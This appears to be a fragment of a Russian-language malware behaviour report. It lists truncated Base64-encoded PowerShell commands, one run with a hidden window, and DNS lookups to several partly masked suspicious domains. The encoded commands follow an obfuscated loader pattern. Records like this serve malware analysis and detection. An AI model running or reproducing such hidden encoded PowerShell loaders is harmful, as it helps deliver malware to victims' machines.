Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAHYAbgBoAGgAeABtAGcAeQB4AGMAeAB6AD0AJwBWAGUAbgBtAHEAdgB6AHcAdwAnADsAJABFAGYAYQBtAGsAegB1AGgAcQB2AG...
- DNS ASK tr####ech-id.com
- DNS ASK dp##nce.org
- DNS ASK su####lkauthar.com
- DNS ASK jo####andelivery.my
- DNS ASK me####recies.online
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAHYAbgBoAGgAeABtAGcAeQB4AGMAeAB6AD0AJwBWAGUAbgBtAHEAdgB6AHcAdwAnADsAJABFAGYAYQBtAGsAegB1AGgAcQB2AG...' (со скрытым окном)